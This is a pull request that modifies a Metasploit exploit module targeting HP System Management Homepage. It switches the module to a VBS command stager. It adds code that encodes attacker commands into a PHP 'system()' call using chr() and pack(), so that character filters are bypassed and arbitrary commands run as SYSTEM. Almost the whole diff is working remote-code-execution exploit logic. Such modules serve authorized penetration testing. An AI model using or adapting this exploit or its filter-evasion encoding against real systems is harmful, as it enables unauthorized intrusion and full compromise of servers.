### PR TITLE
Use CmdStagerVBS instead of CmdStagerTFTP

### DIFF
--- a/modules/exploits/windows/http/hp_sys_mgmt_exec.rb
+++ b/modules/exploits/windows/http/hp_sys_mgmt_exec.rb
@@ -10,7 +10,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
-	include Msf::Exploit::CmdStagerTFTP
+	include Msf::Exploit::CmdStagerVBS
 	include Msf::Exploit::Remote::HttpClient
 
 	def initialize(info={})
@@ -21,9 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				supplying a specially crafted HTTP request, it is possible to control the
 				'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc),
 				which will be used in a exec() function.  This results in arbitrary code execution
-				under the context of SYSTEM.  Please note: In order for the exploit to work, the
-				victim must enable the 'tftp' command, which is the case by default for systems
-				such as Windows XP, 2003, etc.
+				under the context of SYSTEM.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
@@ -37,10 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote
 					['OSVDB', '94191'],
 					['US-CERT-VU', '735364']
 				],
-			'Payload'        =>
-				{
-					'BadChars' => "\x00"
-				},
 			'DefaultOptions' =>
 				{
 					'SSL' => true
@@ -144,7 +138,25 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def execute_command(cmd, opts={})
-		# Payload will be: C:\hp\hpsmh\data\htdocs\smhutil
+		# Payload will be in: C:\hp\hpsmh\data\htdocs\smhutil
+		# Convert cmd to single quoted PHP string while replacing bad character sequences
+		bad_chars = /([\x00-\x20\x22\x23\x26\x2f\x3c\x3e\x5b-\x5e\x60\x7b-\x7d\x7f-\xff]+)/
+		cmd = cmd.split(bad_chars).map.with_index { |v,k|
+			# every odd match is a sequence of bad characters
+			if k.modulo(2) == 1
+				if v.length < 3
+					# chr() is shorter for sequences of one or two bad characters
+					"chr(#{v.each_byte.map(&:ord).join(").chr(")})"
+				else
+					# for any longer sequence, pack() is shorter
+					"pack('C*',#{v.each_byte.map(&:ord).join(",")})"
+				end
+			else
+				# skip empty strings and quote alphanumeric strings
+				v.empty? ? v : "'#{v}'"
+			end
+		}.reject(&:empty?).join(".")
+		cmd = "php -r system(#{cmd});"
 		uri = Rex::Text.uri_encode("#{@uri}#{cmd}&&echo")
 
 		req_opts = {}
@@ -155,8 +167,11 @@ class Metasploit3 < Msf::Exploit::Remote
 			req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"
 		end
 
-		print_status("#{peer} - Executing: #{cmd}")
 		res = send_request_raw(req_opts)
+		if !res or res.code != 200 or res.body.include? 'error'
+			vprint_error("Unexpected response:\n#{res}")
+			fail_with(Exploit::Failure::Unknown, "There was an unexpected response")
+		end
 	end
 
 


### PR DESCRIPTION
By using `php.exe` as stager, the bad characters can be completely bypassed. This allows the use of the CmdStagerVBS, which should be working on all supported Windows systems.
